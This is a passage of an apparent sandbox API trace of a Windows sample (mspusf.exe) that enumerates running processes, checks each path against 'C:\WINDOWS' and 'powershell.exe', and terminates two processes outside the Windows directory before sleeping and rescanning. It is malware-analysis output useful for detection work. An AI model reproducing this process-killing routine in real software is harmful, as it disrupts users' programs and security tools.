hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="involvedzambia.exe")) returned 1 [0060.395] GetCurrentProcessId () returned 0xf00 [0060.395] GetCurrentProcess () returned 0xffffffff [0060.395] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.395] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1004) returned 0x3fc [0060.395] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Sidebar\\involvedzambia.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\involvedzambia.exe")) returned 0x39 [0060.395] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\involvedzambia.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.395] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\involvedzambia.exe", lpSrch="powershell.exe") returned 0x0 [0060.395] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\involvedzambia.exe", lpSrch="powershell.exe") returned 0x0 [0060.396] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\involvedzambia.exe", lpSrch="powershell.exe") returned 0x0 [0060.396] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\involvedzambia.exe", lpSrch="powershell.exe") returned 0x0 [0060.396] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\involvedzambia.exe", lpSrch="powershell.exe") returned 0x0 [0060.396] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.396] GetTickCount () returned 0x1150934 [0060.396] GetCurrentProcessId () returned 0xf00 [0060.396] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x1004) returned 0x404 [0060.396] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.396] TerminateProcess (hProcess=0x404, uExitCode=0x1150934) returned 1 [0060.397] CloseHandle (hObject=0x404) returned 1 [0060.397] CloseHandle (hObject=0x3fc) returned 1 [0060.397] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acceptance.exe")) returned 1 [0060.397] GetCurrentProcessId () returned 0xf00 [0060.397] GetCurrentProcess () returned 0xffffffff [0060.397] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.397] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1018) returned 0x3fc [0060.398] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\acceptance.exe" (normalized: "c:\\program files\\windows sidebar\\acceptance.exe")) returned 0x2f [0060.398] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\acceptance.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.399] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\acceptance.exe", lpSrch="powershell.exe") returned 0x0 [0060.399] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\acceptance.exe", lpSrch="powershell.exe") returned 0x0 [0060.399] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\acceptance.exe", lpSrch="powershell.exe") returned 0x0 [0060.399] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\acceptance.exe", lpSrch="powershell.exe") returned 0x0 [0060.399] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\acceptance.exe", lpSrch="powershell.exe") returned 0x0 [0060.399] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.399] GetTickCount () returned 0x1150943 [0060.399] GetCurrentProcessId () returned 0xf00 [0060.399] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x1018) returned 0x404 [0060.399] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.399] TerminateProcess (hProcess=0x404, uExitCode=0x1150943) returned 1 [0060.400] CloseHandle (hObject=0x404) returned 1 [0060.400] CloseHandle (hObject=0x3fc) returned 1 [0060.400] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.401] GetCurrentProcessId () returned 0xf00 [0060.401] GetCurrentProcess () returned 0xffffffff [0060.401] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.401] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1168) returned 0x0 [0060.401] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0060.401] GetCurrentProcessId () returned 0xf00 [0060.401] GetCurrentProcess () returned 0xffffffff [0060.402] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.402] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x11d0) returned 0x3fc [0060.402] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe")) returned 0x1f [0060.402] StrStrIW (lpFirst="C:\\Windows\\System32\\dllhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\dllhost.exe" [0060.402] CloseHandle (hObject=0x3fc) returned 1 [0060.402] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.403] GetCurrentProcessId () returned 0xf00 [0060.403] GetCurrentProcess () returned 0xffffffff [0060.403] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.403] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1240) returned 0x0 [0060.403] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0060.403] GetCurrentProcessId () returned 0xf00 [0060.403] GetCurrentProcess () returned 0xffffffff [0060.403] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.403] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12d4) returned 0x3fc [0060.404] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0060.404] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0060.404] CloseHandle (hObject=0x3fc) returned 1 [0060.404] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0060.404] GetCurrentProcessId () returned 0xf00 [0060.404] GetCurrentProcess () returned 0xffffffff [0060.404] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.405] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12dc) returned 0x0 [0060.405] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0060.405] GetCurrentProcessId () returned 0xf00 [0060.405] GetCurrentProcess () returned 0xffffffff [0060.405] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.405] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12e4) returned 0x0 [0060.405] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0060.406] GetCurrentProcessId () returned 0xf00 [0060.406] GetCurrentProcess () returned 0xffffffff [0060.406] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.406] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x130c) returned 0x0 [0060.406] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0060.407] GetCurrentProcessId () returned 0xf00 [0060.407] GetCurrentProcess () returned 0xffffffff [0060.407] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.407] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1314) returned 0x3fc [0060.407] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe" (normalized: "c:\\windows\\system32\\apphostregistrationverifier.exe")) returned 0x33 [0060.407] StrStrIW (lpFirst="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe" [0060.407] CloseHandle (hObject=0x3fc) returned 1 [0060.407] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x131c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0060.408] GetCurrentProcessId () returned 0xf00 [0060.408] GetCurrentProcess () returned 0xffffffff [0060.408] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.408] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x131c) returned 0x0 [0060.408] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x135c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x130c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.408] GetCurrentProcessId () returned 0xf00 [0060.408] GetCurrentProcess () returned 0xffffffff [0060.408] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.408] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x135c) returned 0x0 [0060.408] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x12e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.409] GetCurrentProcessId () returned 0xf00 [0060.409] GetCurrentProcess () returned 0xffffffff [0060.409] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.409] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1364) returned 0x0 [0060.409] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mspusf.exe")) returned 1 [0060.410] GetCurrentProcessId () returned 0xf00 [0060.410] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.410] GetCurrentProcessId () returned 0xf00 [0060.410] GetCurrentProcess () returned 0xffffffff [0060.410] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.410] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x704) returned 0x3fc [0060.410] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0060.411] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0060.411] CloseHandle (hObject=0x3fc) returned 1 [0060.411] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.411] GetCurrentProcessId () returned 0xf00 [0060.411] GetCurrentProcess () returned 0xffffffff [0060.411] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.411] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x13f8) returned 0x0 [0060.411] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0060.412] CloseHandle (hObject=0x3f8) returned 1 [0060.412] Sleep (dwMilliseconds=0x3a98) [0070.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x430 [0070.557] Process32FirstW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0070.557] GetCurrentProcessId () returned 0xf00 [0070.557] GetCurrentProcess () returned 0xffffffff [0070.557] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.557] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0070.557] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0070.558] GetCurrentProcessId () returned 0xf00 [0070.558] GetCurrentProcess () returned 0xffffffff [0070.558] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.558] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0070.558] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0070.558] GetCurrentProcessId () returned 0xf00 [0070.558] GetCurrentProcess () returned 0xffffffff [0070.558] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.558] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0070.558] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0070.559] GetCurrentProcessId () returned 0xf00 [0070.559] GetCurrentProcess () returned 0xffffffff [0070.559] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.559] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x198) returned 0x0 [0070.559] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0070.559] GetCurrentProcessId () returned 0xf00 [0070.559] GetCurrentProcess () returned 0xffffffff [0070.559] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.559] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0070.560] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0070.560] GetCurrentProcessId () returned 0xf00 [0070.560] GetCurrentProcess () returned 0xffffffff [0070.560] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.560] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0070.560] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0070.561] GetCurrentProcessId () returned 0xf00 [0070.561] GetCurrentProcess () returned 0xffffffff [0070.561] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.561] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x220) returned 0x0 [0070.561] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0070.561] GetCurrentProcessId () returned 0xf00 [0070.561] GetCurrentProcess () returned 0xffffffff [0070.561] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.561] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0070.561] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0070.562] GetCurrentProcessId () returned 0xf00 [0070.562] GetCurrentProcess () returned 0xffffffff [0070.562] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.562] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x244) returned 0x0 [0070.562] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.562] GetCurrentProcessId () returned 0xf00 [0070.562] GetCurrentProcess () returned 0xffffffff [0070.562] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.562] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2a4) returned 0x0 [0070.562] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0070.563] GetCurrentProcessId () returned 0xf00 [0070.563] GetCurrentProcess () returned 0xffffffff [0070.563] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.563] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0070.563] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0070.563] GetCurrentProcessId () returned 0xf00 [0070.563] GetCurrentProcess () returned 0xffffffff [0070.564] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.564] OpenProcess 